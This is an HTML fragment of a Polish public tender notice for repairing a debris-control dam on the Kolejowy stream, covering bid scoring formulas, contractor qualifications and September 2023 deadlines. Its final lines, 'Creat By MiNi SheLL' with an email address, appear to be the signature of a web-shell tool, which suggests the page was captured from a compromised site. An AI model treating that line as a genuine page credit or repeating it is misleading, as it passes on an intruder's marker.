Wykonawców, którzy złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie prac polegających na remoncie zapory przeciwrumowiskowej na potoku Kolejowy. Konieczność podjęcia prac wynika z decyzji nakazowej Śląskiego Wojewódzkiego Inspektorat Nadzoru Budowlanego. Decyzja nr 87/22 z dn. 25 lipca 20222r. pismo znak WIMB-WI.7741.14.2022.MB1<br/>Planowane przedsięwzięcie zlokalizowane jest w otulinie Żywieckiego Parku Krajobrazowego,<br/>tj. w zakresie obszaru ochronnego znajdującego się wokół chronionego przyrodniczo terenu parku - poza formami przyrody, o których mowa w art. 6 ust. 1 pkt. 1-5 i 7-9 ustawy o ochronie przyrody. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45243000-2 - Roboty w zakresie ochrony przybrzeżnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1 Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>15.2 Zamawiający dokona oceny ofert niepodlegających odrzuceniu na podstawie następujących kryteriów:<br/>15.2.1 C - Cena – kryterium 80%;<br/>15.2.2 R – Okres rękojmi i gwarancji – kryterium 20%;<br/>15.3 Zamawiający przyzna wartości punktowe w kryterium, o których mowa w pkt. 15.2 z zastosowaniem następujących zasad:<br/>15.3.1 W kryterium „Cena” Zamawiający przyzna wartości punktowe według następującego wzoru:<br/>najniższa cena brutto<br/>C = ---------------------------------------------- x 100 x 0,8<br/>cena brutto badanej oferty<br/>15.3.2 W kryterium „Okres rękojmi i gwarancji – „R”<br/>Ro – R min<br/>R = ------------------------------------ x 100 x 0,2<br/>R max – R min<br/>gdzie:<br/>R - liczba punktów przyznana danej ofercie w kryterium okres rękojmi i gwarancji<br/>R max – maksymalny okres rękojmi i gwarancji - tj. 76 miesięcy<br/>R min – minimalny okres rękojmi i gwarancji - tj. 36 miesięcy<br/>R o – okres rękojmi i gwarancji oferty ocenianej<br/>Jeżeli Wykonawca nie wpisze na Formularzu ofertowym okres rękojmi i gwarancji, Zamawiający uzna, że Wykonawca deklaruje<br/>minimalną wymaganą rękojmię i gwarancję przez Zamawiającego. W takim wypadku oferta w tym kryterium otrzyma 0 pkt. Jeżeli<br/>Wykonawca wykaże na Formularzu ofertowym rękojmię i gwarancję większą niż maksymalna rękojmia i gwarancja podlegająca<br/>punktacji, Zamawiający przyzna ofercie maksymalną liczbę punktów przewidzianą w ramach kryterium, tj. 20 pkt.<br/>UWAGA:<br/>a. Okres rękojmi i gwarancji należy podać w formularzu ofertowym w miesiącach. Jeżeli Wykonawca poda okres rękojmi i gwarancji<br/>w latach, Zamawiający przeliczy go na miesiące zgodnie z zasadą 1 rok = 12 miesięcy.<br/>b. MINIMALNY wymagany przez Zamawiającego okres rękojmi i gwarancji wynosi 36 miesięcy. W przypadku podania przez<br/>Wykonawcę krótszego okresu rękojmi i gwarancji niż wymagany, oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust.1<br/>pkt 5) ustawy Prawo zamówień publicznych, jako niezgodna z treścią SWZ. W przypadku nie podania (nie wpisania) w formularzu<br/>ofertowym okresu rękojmi i gwarancji Zamawiający uzna, iż Wykonawca oferuje jedynie wymagany, minimalny okres rękojmi i<br/>gwarancji jakości tj. 36 miesięcy.<br/>MAKSYMALNY punktowany okres rękojmi i gwarancji uwzględniony do oceny ofert wynosi 76 miesięcy. Jeżeli Wykonawca zaoferuje<br/>okres rękojmi i gwarancji dłuższy niż 76 miesięcy do oceny ofert zostanie przyjęty okres 76 miesięcy.<br/>15.4 Kryteria będą liczone wg wzoru: P = C + R<br/>gdzie:<br/>P – oznacza łączną ilość punktów przyznaną ofercie (maksymalnie 100 pkt),<br/>C – oznacza ilość punktów uzyskanych w ramach kryterium „cena” (maksymalnie 80 pkt)<br/>R – oznacza ilość punktów uzyskanych w ramach kryterium „okres rękojmi i gwarancji” (maksymalnie 20 pkt)<br/>15.5 Punktacja przyznawana ofertom w kryterium ceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z<br/>zasadami arytmetyki.<br/>15.6 Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów.<br/>15.7 W przypadku, gdy dwie lub więcej ofert przedstawi taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający<br/>wezwie Wykonawców, którzy złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a)	Wykonawca zobowiązany jest wykazać, że w okresie ostatnich 5 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał i prawidłowo ukończył (potwierdzone dowodami określającymi, czy roboty te zostały wykonane w sposób należyty oraz wskazującymi, czy zostały wykonane zgodnie z przepisami prawa budowlanego):<br/>Dla części 1:<br/>Wykonawca wykonał co najmniej 1 robotę o wartości 70 000 zł zawierającą w swoim zakresie remont lub budowę lub przebudowę ubezpieczeń w postaci koszy siatkowo-kamiennych. Posiadane doświadczenie winno wynikać z jednej umowy. Zamawiający nie dopuszcza sumowania doświadczenia na potrzeby wykazania spełnienia warunku udziału w postępowaniu dwóch lub więcej umów (dotyczy to także wykonawców wspólnie ubiegających się o zamówienie). <br/>Dla części 2:<br/>Wykonawca wykonał co najmniej 1 robotę o wartości 90 000 zł zawierającą w swoim zakresie wykonanie zasypu kamieniem ciężkim lub narzutu kamiennego lub opaski brzegowej z kamienia. Posiadane doświadczenie winno wynikać z jednej umowy. Zamawiający nie dopuszcza sumowania doświadczenia na potrzeby wykazania spełnienia warunku udziału w postępowaniu dwóch lub więcej umów (dotyczy to także wykonawców wspólnie ubiegających się o zamówienie).<br/>Dla części 3:<br/>Wykonawca wykonał co najmniej 1 robotę o wartości 75 000 zł zawierającą w swoim zakresie remont lub budowę lub modernizację zabudowy regulacyjnej na rzekach lub potokach w zakresie którego wykonano roboty betonowe na urządzeniach wodnych lub obiektach hydrotechnicznych. Zamawiający nie dopuszcza sumowania doświadczenia na potrzeby wykazania spełnienia warunku udziału w postępowaniu dwóch lub więcej umów (dotyczy to także wykonawców wspólnie ubiegających się o zamówienie).<br/>b)	Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponować w okresie wykonywania zamówienia i skieruje do jego realizacji w charakterze kierownika robót osobę lub osoby posiadające kwalifikacje konieczne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 r. (tj. Dz.U. z 2021 r. poz. 2351 z póź. zm.), to jest osobę lub osoby posiadającą uprawnienia do kierowania robotami w specjalności inżynieryjnej hydrotechnicznej bez ograniczeń lub melioracyjne bez ograniczeń lub konstrukcyjno – budowlane w ograniczonym zakresie bez ograniczeń w zakresie obiektów budowlanych gospodarki wodnej i melioracji wodnych lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów i która jest członkiem Okręgowej Izby Inżynierów Budownictwa.<br/><br/>Samodzielna funkcja techniczna może być pełniona także przez osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w Ustawie z dnia 22.12.2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">- odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>- oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z art. 108 i 109 ust.1 pkt. 4 ustawy Pzp. Wzór wykazu stanowi Załącznik Nr 10 do SIWZ<br/>- oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 (lub odpowiednio 125 ust. 5) ustawy, w zakresie podstaw wykluczenia z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa. Wzór wykazu stanowi Załącznik Nr 11 do SIWZ<br/>- oświadczenie wykonawcy, o braku przynależności do tej samej grupy kapitałowej<br/>w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej niezależnie od innego wykonawcy należącego do tej samej grupy<br/>kapitałowej, zgodnego z wzorem stanowiącym Załącznik nr 13 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunku opisanego w pkt. 7.2 ppkt 7.2.1 lit. a) rozdziału 7 SIWZ – wykaz zrealizowanych robót zawierający informacje dotyczące ich przedmiotu, wartości, odbiorców, dat wykonania wraz z dowodami potwierdzającymi, że roboty te zostały wykonane należycie. Wzór wykazu stanowi Załącznik Nr 7 do SIWZ.<br/>W celu potwierdzenia spełniania warunku opisanego w pkt. 7.2 ppkt 7.2.1 lit. b) rozdziału 7 SIWZ – wykaz osób, które zostaną skierowane do realizacji zamówienia zawierający informacje dotyczące ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia, a także zakresu wykonywanych przez nie czynności oraz podstawie dysponowania tymi osobami. Wzór wykazu stanowi Załącznik Nr 8 do SIWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz oferty zgodny w treści z Załącznikiem Nr 1 do SWZ,<br/>2) Kosztorys ofertowy zgodnie z treścią Załącznika nr 5a – 5c do SWZ<br/>- Oświadczenia lub dokumenty składane razem z ofertą:<br/>- pełnomocnictwo, w przypadku, gdy ofertę lub załączone do niej oświadczenia lub dokumenty podpisuje pełnomocnik;<br/>- Oświadczenie Wykonawcy o zakresie wykonania zamówienia przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia zgodnie z treścią Załącznika nr 12 do SWZ (jeżeli dotyczy)<br/>- oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału<br/>w postępowaniu, zgodny w treści z Załącznikiem nr 8 do SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że<br/>Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1 i art. 109 ust. 1 pkt. 4) ustawy Pzp oraz<br/>art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa oraz spełnia warunki udziału w postępowaniu określone w SWZ. W<br/>przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>- Oświadczenie, zgodne w treści z Załącznikiem Nr 9 do SWZ, aktualne na dzień składania ofert, dotyczące innych<br/>podmiotów, na których zasoby powołuje się Wykonawca, celem wykazania braku istnienia wobec nich podstaw wykluczenia<br/>oraz spełniania, w zakresie, w jakim Wykonawca powołuje się na ich zasoby, warunków udziału w postępowaniu.<br/>- dowód potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami innych<br/>podmiotów, który stanowi w szczególności zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy<br/>niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienia, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Zobowiązanie podmiotu udostępniającego zasoby, potwierdza, że stosunek łączący wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>- zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>- sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy<br/>wykonywaniu zamówienia;<br/>czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane lub usługi, których wskazane zdolności dotyczą <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający, dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w<br/>rozumieniu art. 58 ustawy Pzp) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu<br/>albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego adres należy<br/>wpisać w Formularzu oferty.<br/>Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z którego wynika takie pełnomocnictwo należy złożyć razem z ofertą.<br/>Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie zgodne z treścią Załącznika Nr 8 do<br/>SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że każdy z Wykonawców ubiegających się wspólnie o<br/>zamówienie nie podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp oraz<br/>spełnia warunki udziału w postępowaniu określone w SWZ w zakresie, w którym każdy z nich wykazuje brak podstaw<br/>wykluczenia z postępowania oraz spełnia warunki udziału w postępowaniu.<br/>Każdy z Wykonawców występujących wspólnie zobowiązany jest do wykazania braku podstaw do wykluczenia z<br/>postępowania o udzielenie zamówienia publicznego. W takim przypadku oświadczenia lub dokumenty wymienione w pkt 10.2.2 SWZ składa każdy z Wykonawców występujących wspólnie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) Zmiana terminu realizacji przedmiotu umowy spowodowana niezawinionym i niemożliwym do uniknięcia przez<br/>Wykonawcę opóźnieniem<br/>2) Zmiana sposobu spełnienia świadczenia na skutek wystąpienia dowolnej z następujących okoliczności- pełen opis<br/>paragraf 13 umowy<br/>3) Inne zmiany spowodowane następującymi okolicznościami - pełen opis paragraf 13 umowy<br/>4) Zaistnienia innej okoliczności prawnej, technicznej lub ekonomicznej skutkującej niemożliwością wykonania umowy,<br/>zgodnie z jej treścią<br/>5) Zmiany wysokości wynagrodzenia w przypadku, gdy ilość faktycznie wykonanych robót będzie odbiegała od ilości robót<br/>wynikających wprost z zestawienia prac planowanych (dokumentacja techniczna) będącego podstawą obliczenia<br/>wynagrodzenia kosztorysowego, wynagrodzenie określone w § 3 ust. 1 Umowy zostanie proporcjonalnie zmniejszone lub<br/>zwiększone przy zachowaniu cen jednostkowych zawartych w kosztorysie ofertowym. Wartość zwiększonego lub<br/>zmniejszonego wynagrodzenia zostaną określone „Protokołem konieczności zwiększającym zakres lub zmniejszającym<br/>zakres robót ” potwierdzonym przez inspektora nadzoru i zatwierdzonym przez Zamawiającego. Z zastrzeżeniem iż nie<br/>przewiduje się wzrostu cen jednostkowych przedstawionych w kosztorysie ofertowym, jak również nie przewiduje się<br/>możliwości zmian składników cenotwórczych podanych w ofercie bez względu na zaistniałą w międzyczasie sytuację za<br/>wyjątkiem zmiany.<br/>2. Dopuszczalna jest zmiana w harmonogramie rzeczowo-finansowym polegająca na zmianie kolejności wykonania robót,<br/>zmianie terminu wykonania poszczególnych odcinków lub robót, lub zmianie zakresu robót do wykonania w poszczególnych<br/>odcinkach w przypadku zmiany technologii realizacji robót, zmiany materiałów, braku dostępu materiałów lub wystąpienia<br/>innej przyczyny powodującej, że realizacja robót w dotychczas ustalonym harmonogramie rzeczowo- finansowym jest 3.<br/>Zamawiający może wyrazić zgodę na zmianę umowy polegającą na skróceniu terminu realizacji umowy motywowaną<br/>przez Wykonawcę leżącymi po jego stronie względami, np. organizacyjnymi lub ekonomicznymi.<br/>4. Zamawiający przewiduje możliwość zmiany umowy o charakterze podmiotowym w zakresie Wykonawcy, jeżeli po stronie<br/>Wykonawcy występują podmioty działające wspólnie (np. konsorcjum, spółka cywilna) i w trakcie realizacji umowy wystąpią<br/>okoliczności uniemożliwiające lub utrudniające dalsze działanie wszystkim podmiotom tworzącym stronę wykonawczą, w<br/>szczególności gdyby została ogłoszona upadłość lub otwarta została likwidacja jednego lub kilku z tych podmiotów. W taki<br/>przypadku dopuszcza się, za uprzednią zgodą Zamawiającego, przejęcie obowiązków Wykonawcy umowy przez pozostałe<br/>podmioty tworzące stronę wykonawczą celem dokończenia realizacji umowy na niezmienionych warunkach<br/>przedmiotowych.<br/>Pełen zakres zmian określa paragraf 13 wzoru umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać elektronicznie poprzez Platformę Zakupową Zamwijącego https://przetargi.wody.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-25 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com